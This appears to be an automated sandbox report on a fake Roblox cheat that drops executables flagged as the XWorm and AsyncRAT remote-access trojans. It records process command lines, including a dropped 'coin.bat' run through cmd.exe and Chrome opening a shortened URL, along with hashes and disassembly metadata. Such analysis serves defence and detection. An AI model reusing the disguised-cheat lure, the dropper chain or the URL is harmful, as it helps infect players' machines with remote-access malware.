                                                                                                Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Target ID:0
                                                                                                Start time:18:46:05
                                                                                                Start date:29/07/2024
                                                                                                Path:C:\Users\user\Desktop\roblox cheat.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\roblox cheat.exe"
                                                                                                Imagebase:0x7a0000
                                                                                                File size:6'410'752 bytes
                                                                                                MD5 hash:6B94734FEAC8EDB9F925385163AD59C9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:2
                                                                                                Start time:18:46:05
                                                                                                Start date:29/07/2024
                                                                                                Path:C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user~1\AppData\Local\Temp\robloxPX1instaler.exe"
                                                                                                Imagebase:0x810000
                                                                                                File size:5'720'984 bytes
                                                                                                MD5 hash:27469372591B14FF1C57654FACB5E020
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Antivirus matches:
                                                                                                • Detection: 0%, ReversingLabs
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:3
                                                                                                Start time:18:46:06
                                                                                                Start date:29/07/2024
                                                                                                Path:C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe"
                                                                                                Imagebase:0x7ff6c16b0000
                                                                                                File size:630'062 bytes
                                                                                                MD5 hash:FC411F4D9F4DBA5104CB1549153A8684
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000003.1260021270.00000225ABF82000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000003.1260021270.00000225ABF82000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:5
                                                                                                Start time:18:46:07
                                                                                                Start date:29/07/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\coin.bat" "
                                                                                                Imagebase:0x7ff741f30000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:6
                                                                                                Start time:18:46:07
                                                                                                Start date:29/07/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff75da10000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:15
                                                                                                Start time:18:46:16
                                                                                                Start date:29/07/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd
                                                                                                Imagebase:0x7ff741f30000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:16
                                                                                                Start time:18:46:16
                                                                                                Start date:29/07/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff75da10000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:18
                                                                                                Start time:18:46:17
                                                                                                Start date:29/07/2024
                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6
                                                                                                Imagebase:0x7ff6c4390000
                                                                                                File size:3'242'272 bytes
                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:20
                                                                                                Start time:18:46:17
                                                                                                Start date:29/07/2024
                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2184,i,14828535627695779647,3084874413555431357,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                Imagebase:0x7ff6c4390000
                                                                                                File size:3'242'272 bytes
                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Disassembly

                                                                                                Reset < >

                                                                                                  Executed Functions

                                                                                                  Function 014E164C Relevance: 11.6, Strings: 8, Instructions: 1623COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1253932426.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14e0000_roblox cheat.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Xq$Xq$Xq$Xq$Xq$Xq$Xq$Xq
                                                                                                  • API String ID: 0-1539424098
                                                                                                  • Opcode ID: 61a7b7cde56ce23fd9e7fb5784230ceee3bcaed14e2627a6c1419a594de91033
                                                                                                  • Instruction ID: 7e4a6ad3112b73255d966e1bb9ee59ddd91a67adf06878840afd64ef1535f07e
                                                                                                  • Opcode Fuzzy Hash: 61a7b7cde56ce23fd9e7fb5784230ceee3bcaed14e2627a6c1419a594de91033
                                                                                                  • Instruction Fuzzy Hash: C8C2B431818B758BDB65DF348CA0397BFF2FF12729714899EC4DA97265D232A841CB81
                                                                                                  Function 014E7AFF Relevance: 5.3, Strings: 4, Instructions: 343COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1253932426.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14e0000_roblox cheat.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Hq$Hq$Hq$Hq
                                                                                                  • API String ID: 0-1646495738
                                                                                                  • Opcode ID: 7dfae84c9671fb4f20167ad104cb6066d6c6ebd8892d4e1493d74a725745959f
                                                                                                  • Instruction ID: e48abb80b8ec1e2e0b7e73ae1b0b40df337c3737a1ef1c48c3db6a82939c41f5
                                                                                                  • Opcode Fuzzy Hash: 7dfae84c9671fb4f20167ad104cb6066d6c6ebd8892d4e1493d74a725745959f
                                                                                                  • Instruction Fuzzy Hash: DAD16F30B006158FDB25DF78D858AAE7BF2BFC8712F148529D506973A4DB35AC06CB91
                                                                                                  Function 014E92D8 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1253932426.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14e0000_roblox cheat.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4'q$Hq$$q$$q
                                                                                                  • API String ID: 0-4207532827
                                                                                                  • Opcode ID: aeb252b758d5fbb1186e662c7b01f659c3b22d49ef4d96515ba60c09fe8bd65d
                                                                                                  • Instruction ID: 5c43cfc66cc53d83573be0470032ef4b0c4130b4bdb2154448c8373e8250eef8
                                                                                                  • Opcode Fuzzy Hash: aeb252b758d5fbb1186e662c7b01f659c3b22d49ef4d96515ba60c09fe8bd65d
                                                                                                  • Instruction Fuzzy Hash: 0451A0307082158FDB296B79A86C23E3AEAAFD5646719446FD507CB3E6DF34CC028791
                                                                                                  Function 014E97A8 Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1253932426.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14e0000_roblox cheat.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Xq
                                                                                                  • API String ID: 0-599127549
                                                                                                  • Opcode ID: 28d106752613e3b609a152836325f04e26415b9bba2ce39840d3ad89a4702da4
                                                                                                  • Instruction ID: d5d7c08c7e251d2d0cfb3f37b29310d3e678d77e0aa6b971f1e699a35fe638f5
                                                                                                  • Opcode Fuzzy Hash: 28d106752613e3b609a152836325f04e26415b9bba2ce39840d3ad89a4702da4
                                                                                                  • Instruction Fuzzy Hash: E551F431B043249FC7259F6CD8A86AEBBE6FFC6214B19446FE446C73A5DA358C02C791
                                                                                                  Function 014ED600 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1253932426.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14e0000_roblox cheat.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 8q
                                                                                                  • API String ID: 0-4083045702
                                                                                                  • Opcode ID: be1584fb1afc317f265e1a1842a821238de3631c3bb14e0a7f9d2b40ded99c78
                                                                                                  • Instruction ID: e1bd8518c6a5cf267bd3325de0dfa722737ef0585711072ae50bd90976da595f
                                                                                                  • Opcode Fuzzy Hash: be1584fb1afc317f265e1a1842a821238de3631c3bb14e0a7f9d2b40ded99c78
                                                                                                  • Instruction Fuzzy Hash: 10212574E00209CFDB14DFA9E584AAEBBF1FF89300F1085AAC815A7261DB349E45CF90
                                                                                                  Function 014ED610 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1253932426.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14e0000_roblox cheat.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 8q
                                                                                                  • API String ID: 0-4083045702
                                                                                                  • Opcode ID: f6ab031a89c50d1ec11d5365465d6e43db5cec27f54cb74dba12a30d6dc78d12
                                                                                                  • Instruction ID: 4c8fc3017b3f586ebecc06b64c282ec9da905af3945e43f8a9a2c2e4ce2e1e45
                                                                                                  • Opcode Fuzzy Hash: f6ab031a89c50d1ec11d5365465d6e43db5cec27f54cb74dba12a30d6dc78d12
                                                                                                  • Instruction Fuzzy Hash: AD210274E00209CFDB04DFA9E544AAEBBF1FF88300F10806AD514A7261DB349E45CF90
                                                                                                  Function 014E09B0 Relevance: .4, Instructions: 449COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1253932426.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14e0000_roblox cheat.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 453d4385b711480324055f246833707f81e31c310859095838b0f14ddb4e98b6
                                                                                                  • Instruction ID: 9ef81824b29e75a00c062f167bca0e58b5923cf9558162d1b8eb612a3e6c89d3
                                                                                                  • Opcode Fuzzy Hash: 453d4385b711480324055f246833707f81e31c310859095838b0f14ddb4e98b6
                                                                                                  • Instruction Fuzzy Hash: FA3259B4E012298FDB64DF69D998B9DBBB1BB49300F1081EAD80DA7354DB705E85CF11
                                                                                                  Function 014E95A8 Relevance: .2, Instructions: 178COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1253932426.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14e0000_roblox cheat.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8fd9b4e5921784014f84f65e444831e1583b8486b482b2f6a8a9a971a5a47aac
                                                                                                  • Instruction ID: 70993ade74d283a70293a4a7621326b2a8b7434146ffc5c34abb123672fef4cf
                                                                                                  • Opcode Fuzzy Hash: 8fd9b4e5921784014f84f65e444831e1583b8486b482b2f6a8a9a971a5a47aac
                                                                                                  • Instruction Fuzzy Hash: 2B51B334354661CFC76ADB28A86857D37A2BBD961674840AAE447C73E8DF348C07CBC5
                                                                                                  Function 014E9D48 Relevance: .1, Instructions: 55COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1253932426.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14e0000_roblox cheat.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 03aac39c31273cf7ffafab5e2a61bbd27c953814fcf211cfdb341004280a5bba
                                                                                                  • Instruction ID: 1f7d855496c56a6a85bb55ba6cd1e049d8ddce3148a103753fd75ec5a6fdd4b2
                                                                                                  • Opcode Fuzzy Hash: 03aac39c31273cf7ffafab5e2a61bbd27c953814fcf211cfdb341004280a5bba
                                                                                                  • Instruction Fuzzy Hash: 440128307052145FD715173A98186ABBAEBAFCE211B598077E50AC33E9DE358C0383A1
                                                                                                  Function 014ED578 Relevance: .0, Instructions: 44COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1253932426.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14e0000_roblox cheat.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b650495777a860b157af8b10c4d03df23631c64539a26b12c4b720b5ffa22bff
                                                                                                  • Instruction ID: f51aad112b1962f95e97ae37b1ea896a2227f0dfbc1d5bb49d13e2a1c13283b9
                                                                                                  • Opcode Fuzzy Hash: b650495777a860b157af8b10c4d03df23631c64539a26b12c4b720b5ffa22bff
                                                                                                  • Instruction Fuzzy Hash: 1A1157B4E04209DFCB14CFA9D5885AEBFF1FF49314B24859AC854AB361E7315A02CF51
                                                                                                  Function 014E91F0 Relevance: .0, Instructions: 24COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1253932426.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14e0000_roblox cheat.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1c4729b25761d0549d385c06c6db8ed10d38c19c83fefd3cd2a2f276a7a26a34
                                                                                                  • Instruction ID: 282eff9e21315117bd8401fbf239095c623879a0832f3bbfbbc828591de5d4b1
                                                                                                  • Opcode Fuzzy Hash: 1c4729b25761d0549d385c06c6db8ed10d38c19c83fefd3cd2a2f276a7a26a34
                                                                                                  • Instruction Fuzzy Hash: AFE0ED70D512099FCB94DFA8C9466EFBBF4EB48210F1442AAE808E7354E7754B118FC1
                                                                                                  Function 014E9200 Relevance: .0, Instructions: 17COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1253932426.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14e0000_roblox cheat.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a6b3e388ce7620c38eb970efe4c9ce9db35c5241f7ebaea75482a43ab2077c76
                                                                                                  • Instruction ID: 14a8f75b9203676dc4863e61b076527d6db62447a25f8a4fa6b5eabe8c6431cf
                                                                                                  • Opcode Fuzzy Hash: a6b3e388ce7620c38eb970efe4c9ce9db35c5241f7ebaea75482a43ab2077c76
                                                                                                  • Instruction Fuzzy Hash: 92E0EC70E042099FCB94EFA9C54666EBBF4AB48201F1085AAD808D6254E7705A518BC1

                                                                                                  Non-executed Functions

                                                                                                  Function 014E31CA Relevance: .3, Instructions: 311COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1253932426.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14e0000_roblox cheat.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2b80a79ae8a6d72279619ede6dcd1160f617e8232dbd7c910f70ddbff479a4c6
                                                                                                  • Instruction ID: c08dd915607d9af568977a90e22ebbcf8f0b1b872a176adf1749114325b16ad1
                                                                                                  • Opcode Fuzzy Hash: 2b80a79ae8a6d72279619ede6dcd1160f617e8232dbd7c910f70ddbff479a4c6
                                                                                                  • Instruction Fuzzy Hash: 2BB19632808B39CBCF69EF78C894347B7A1FF16319325859E9485EB5A4D272B841CBC5
                                                                                                  Function 014E34C1 Relevance: .3, Instructions: 294COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1253932426.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14e0000_roblox cheat.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b38b8e5eb946739c3f98f98302d3b9c1acdba584140656062e40e4c0820a9bd4
                                                                                                  • Instruction ID: a6b5a0e370f61b7c576133a989c863501d8a893babe738669cfcc7effb52b0b4
                                                                                                  • Opcode Fuzzy Hash: b38b8e5eb946739c3f98f98302d3b9c1acdba584140656062e40e4c0820a9bd4
                                                                                                  • Instruction Fuzzy Hash: BFA11931858B79CBCF19EF78C994347B7B1FF16329369849ED495EB1A4D226A800CBC1
                                                                                                  Function 014E9F48 Relevance: 5.4, Strings: 4, Instructions: 426COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1253932426.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14e0000_roblox cheat.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Xq$Xq$Xq$Xq
                                                                                                  • API String ID: 0-3965792415
                                                                                                  • Opcode ID: 0a2a28bb9bb0974ab2d56160b27e6832d069e11a2f64b3fda1079fbeb5ce55c7
                                                                                                  • Instruction ID: f067a912aa047474018ef2a19fff60f6201f42731e3e72d40765cf598244305b
                                                                                                  • Opcode Fuzzy Hash: 0a2a28bb9bb0974ab2d56160b27e6832d069e11a2f64b3fda1079fbeb5ce55c7
                                                                                                  • Instruction Fuzzy Hash: C7D17C31905FA28BD771CB1C9DA87DBF7E1FFA032AB68459B808447728F63148919BC5
                                                                                                  Function 014E9F58 Relevance: 5.1, Strings: 4, Instructions: 91COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1253932426.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14e0000_roblox cheat.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Xq$Xq$Xq$Xq
                                                                                                  • API String ID: 0-3965792415
                                                                                                  • Opcode ID: 07ae98492db3431755bc5de6ae3bf5bd021297bc7f7586e5bf2ffa41591c3b95
                                                                                                  • Instruction ID: 8149492c3da386aeac87ccddfc2a250d9693351ab93c43dd4ac7c26330257183
                                                                                                  • Opcode Fuzzy Hash: 07ae98492db3431755bc5de6ae3bf5bd021297bc7f7586e5bf2ffa41591c3b95
                                                                                                  • Instruction Fuzzy Hash: 9431B770E0021F47EF358A6DC8557BFBAE66F84202F2400BB892DA7351EA31CD45DB91
                                                                                                  Function 014E1690 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1253932426.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14e0000_roblox cheat.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Xq$Xq$Xq$Xq
                                                                                                  • API String ID: 0-3965792415
                                                                                                  • Opcode ID: 84a6143845760cccd403c26ba7d0c0ba4362567412f8a037a76360b180a964de
                                                                                                  • Instruction ID: cbb1262bbc5b70525e61163156d5dfe7d30846413e8bf69e2601167583d35057
                                                                                                  • Opcode Fuzzy Hash: 84a6143845760cccd403c26ba7d0c0ba4362567412f8a037a76360b180a964de
                                                                                                  • Instruction Fuzzy Hash: 6E317630E403294BEF759BA9C84576FB6F57B84A02F14416BC51DA7361DB70CA81CBD2

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:21%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:3.7%
                                                                                                  Total number of Nodes:485
                                                                                                  Total number of Limit Nodes:7
                                                                                                  execution_graph 1395 b06350 1396 b0636e 1395->1396 1409 b06310 1396->1409 1398 b0638c ___except_validate_context_record 1400 b0641d 1398->1400 1401 b063ee 1398->1401 1405 b0642a __IsNonwritableInCurrentImage 1398->1405 1399 b06310 _ValidateLocalCookies 5 API calls 1399->1400 1401->1399 1401->1400 1402 b0dfd0 RtlUnwind 1403 b06477 1402->1403 1404 b06310 _ValidateLocalCookies 5 API calls 1403->1404 1407 b0649d 1404->1407 1405->1402 1406 b064c5 1407->1406 1408 b131dc 14 API calls 1407->1408 1408->1406 1410 b06322 1409->1410 1411 b0632f 1409->1411 1413 b02f6a 1410->1413 1414 b02f72 1413->1414 1415 b02f73 IsProcessorFeaturePresent 1413->1415 1414->1411 1417 b02fb5 1415->1417 1420 b02f78 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 1417->1420 1419 b03098 1419->1411 1420->1419 1982 b02820 1985 b034e2 1982->1985 1984 b02825 1984->1984 1986 b034f8 1985->1986 1988 b03501 1986->1988 1989 b03495 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 1986->1989 1988->1984 1989->1988 1990 b0df40 1991 b0df52 1990->1991 1993 b0df60 1990->1993 1992 b02f6a _ValidateLocalCookies 5 API calls 1991->1992 1992->1993 1994 b2383b 1995 b23847 ___free_lconv_mon 1994->1995 2000 b24802 EnterCriticalSection 1995->2000 1997 b23856 2001 b238b6 1997->2001 2000->1997 2004 b2484a LeaveCriticalSection 2001->2004 2003 b238a8 2004->2003 1421 b1443f 1422 b1444b ___free_lconv_mon 1421->1422 1423 b14452 GetLastError ExitThread 1422->1423 1424 b1445f 1422->1424 1435 b2a1c5 GetLastError 1424->1435 1426 b14464 1485 b2d0f8 1426->1485 1429 b1447b 1490 b1461e 1429->1490 1436 b2a1e1 1435->1436 1437 b2a1db 1435->1437 1441 b2a1e5 SetLastError 1436->1441 1496 b2cd5a 1436->1496 1508 b2cd1b 1437->1508 1445 b2a275 1441->1445 1446 b2a27a 1441->1446 1445->1426 1524 b1462c 1446->1524 1448 b2a21a 1451 b2cd5a ___free_lconv_mon 6 API calls 1448->1451 1449 b2a22b 1452 b2cd5a ___free_lconv_mon 6 API calls 1449->1452 1450 b2a27f 1456 b2cd1b ___free_lconv_mon 6 API calls 1450->1456 1459 b2a291 1450->1459 1463 b2a228 1451->1463 1453 b2a237 1452->1453 1454 b2a252 1453->1454 1455 b2a23b 1453->1455 1519 b29ff3 1454->1519 1458 b2cd5a ___free_lconv_mon 6 API calls 1455->1458 1456->1459 1457 b2cd5a ___free_lconv_mon 6 API calls 1462 b2a2ab 1457->1462 1458->1463 1459->1457 1464 b2a297 1459->1464 1462->1464 1469 b2b99b ___free_lconv_mon 14 API calls 1462->1469 1513 b2a4b0 1463->1513 1466 b1462c 43 API calls 1464->1466 1467 b2a29c 1464->1467 1470 b2a315 1466->1470 1467->1426 1468 b2a4b0 ___free_lconv_mon 14 API calls 1468->1441 1471 b2a2bb 1469->1471 1472 b2a2c3 1471->1472 1473 b2a2d8 1471->1473 1475 b2cd5a ___free_lconv_mon 6 API calls 1472->1475 1474 b2cd5a ___free_lconv_mon 6 API calls 1473->1474 1477 b2a2e4 1474->1477 1476 b2a2cf 1475->1476 1480 b2a4b0 ___free_lconv_mon 14 API calls 1476->1480 1478 b2a2f7 1477->1478 1479 b2a2e8 1477->1479 1482 b29ff3 ___free_lconv_mon 14 API calls 1478->1482 1481 b2cd5a ___free_lconv_mon 6 API calls 1479->1481 1480->1464 1481->1476 1483 b2a302 1482->1483 1484 b2a4b0 ___free_lconv_mon 14 API calls 1483->1484 1484->1467 1486 b1446f 1485->1486 1487 b2d10a GetPEB 1485->1487 1486->1429 1493 b2d003 1486->1493 1487->1486 1488 b2d11d 1487->1488 1967 b2cb8d 1488->1967 1970 b144f4 1490->1970 1492 b1462b 1494 b2caca ___free_lconv_mon 5 API calls 1493->1494 1495 b2d01f 1494->1495 1495->1429 1536 b2caca 1496->1536 1499 b2cd94 TlsSetValue 1500 b2a1fd 1500->1441 1501 b2b99b 1500->1501 1506 b2b9a8 ___free_lconv_mon 1501->1506 1502 b2b9e8 1554 b0e672 1502->1554 1503 b2b9d3 RtlAllocateHeap 1504 b2a212 1503->1504 1503->1506 1504->1448 1504->1449 1506->1502 1506->1503 1551 b325ed 1506->1551 1509 b2caca ___free_lconv_mon 5 API calls 1508->1509 1510 b2cd37 1509->1510 1511 b2cd52 TlsGetValue 1510->1511 1512 b2cd40 1510->1512 1512->1436 1514 b2a4bb RtlFreeHeap 1513->1514 1515 b2a4e5 1513->1515 1514->1515 1516 b2a4d0 GetLastError 1514->1516 